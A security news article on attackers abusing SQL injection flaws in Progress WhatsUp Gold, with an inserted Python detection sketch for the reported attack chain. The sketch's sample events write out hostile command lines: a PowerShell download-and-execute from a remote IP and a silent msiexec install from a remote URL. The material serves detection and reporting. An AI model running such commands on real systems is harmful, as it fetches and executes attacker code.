Hackers use a public exploit to target the WhatsUp Gold software

September 17, 2024
WhatsUp Gold IT Infrastructure Software Cyberattack

Threat actors have been using publicly available exploit code to target two flaws in Progress Software’s WhatsUp Gold network availability and performance monitoring software.

The two bugs exploited in attacks since August 30 are SQL injection flaws known as CVE-2024-6670 and CVE-2024-6671. These vulnerabilities could provide attackers with unauthenticated access to encrypted credentials.

Although the vendor addressed these flaws over two weeks ago, many organisations running the software have still not upgraded to the latest version, and threat actors are taking advantage of those outdated installations.

A technical write-up shows how insufficient sanitisation of user input can be exploited to write arbitrary passwords into administrator account password fields, leaving those accounts open to takeover.


The WhatsUp Gold exploit allegedly came from a proof-of-concept that threat actors immediately adopted and employed in their campaigns.


According to investigations, the hackers’ exploitation of the WhatsUp Gold vulnerabilities appears to have been based on a particular proof-of-concept (PoC) for bypassing authentication.

The attackers also used the exploit to gain remote code execution and to deploy payloads. One researcher’s telemetry detected the first signs of active exploitation five hours after the researcher published the proof-of-concept exploit code.

The attackers use WhatsUp Gold’s genuine Active Monitor PowerShell Script feature to execute numerous PowerShell scripts from remote URLs via NmPoller.exe.

Subsequently, the attackers leverage the legitimate Windows utility 'msiexec.exe' to install several remote access trojans (RATs) from MSI packages, including Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote.

Deploying these RATs enables attackers to establish persistence on compromised systems. The researchers also observed that the attackers sometimes deploy multiple payloads on the same host.
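As an added defender-side illustration, which is not code from the article or from the researchers it cites, the following Python sketch flags the process chain described above: NmPoller.exe launching PowerShell that fetches a script from a remote URL, and msiexec.exe installing a package from a remote URL. NmPoller.exe spawning PowerShell is by itself expected behaviour of the Active Monitor PowerShell Script feature, so that case is reported at low severity rather than suppressed. All sample events, the install path, IP addresses and file names are constructed assumptions, and the `parent|image|command line` layout is a simplification of a Sysmon-style process-creation record.

```python
"""Detection sketch for the WhatsUp Gold abuse chain (added example, not from the article)."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import List, Optional

# Constructed process-creation events: "parent image|child image|child command line".
# Paths, IP addresses and file names are assumptions made for this example.
SAMPLE_EVENTS = [
    "C:\\Program Files (x86)\\Ipswitch\\WhatsUp\\NmPoller.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')\"",
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\Windows\\System32\\msiexec.exe|"
    "msiexec.exe /i http://198.51.100.7/agent.msi /qn",
    "C:\\Windows\\explorer.exe|C:\\Windows\\System32\\msiexec.exe|"
    "msiexec.exe /i C:\\Users\\admin\\Downloads\\7zip.msi",
    "C:\\Program Files (x86)\\Ipswitch\\WhatsUp\\NmPoller.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -File C:\\ProgramData\\Ipswitch\\scripts\\check_disk.ps1",
]

URL_RE = re.compile(r"""https?://[^\s'"]+""", re.IGNORECASE)
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


@dataclass
class Event:
    parent: str
    image: str
    cmdline: str


@dataclass
class Finding:
    rule: str
    severity: str
    event: Event


def parse_event(line: str) -> Event:
    """Split the simplified 'parent|image|cmdline' record; cmdline may itself contain '|'."""
    parent, image, cmdline = line.split("|", 2)
    return Event(parent, image, cmdline)


def basename(path: str) -> str:
    """Case-insensitive executable name, so path variations do not defeat the match."""
    return PureWindowsPath(path).name.lower()


def evaluate(ev: Event) -> Optional[Finding]:
    """Apply the two behaviours from the reported attack chain to one event."""
    parent, image = basename(ev.parent), basename(ev.image)
    remote_urls = URL_RE.findall(ev.cmdline)

    # Active Monitor PowerShell Script feature: NmPoller.exe runs PowerShell.
    # Pulling the script body from a remote URL is the abuse pattern described.
    if parent == "nmpoller.exe" and image in POWERSHELL_IMAGES:
        if remote_urls:
            return Finding("nmpoller_remote_powershell", "high", ev)
        # Local scripts are normal for this feature; keep visibility at low severity.
        return Finding("nmpoller_local_powershell", "low", ev)

    # msiexec.exe installing straight from a remote URL (RAT MSI packages in the report).
    if image == "msiexec.exe" and remote_urls:
        return Finding("msiexec_remote_install", "medium", ev)

    return None


def analyze(lines: List[str]) -> List[Finding]:
    """Run every record through the rules and return findings in input order."""
    findings = []
    for line in lines:
        finding = evaluate(parse_event(line))
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.event.cmdline}")
```

In a real deployment the same two rules map directly onto Sysmon Event ID 1 or Windows Security Event 4688 fields (ParentImage/Image/CommandLine); correlating a high-severity NmPoller finding with a subsequent msiexec remote install from the same host is the strongest signal of the chain the article describes.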

So far, researchers investigating the ongoing exploitation have not been able to attribute these attacks to a specific or known threat group. However, the use of several remote access trojans suggests that a ransomware group may be behind the attacks.

Organisations currently running the exploited software should treat this threat seriously, as unpatched installations remain exposed to these attacks.
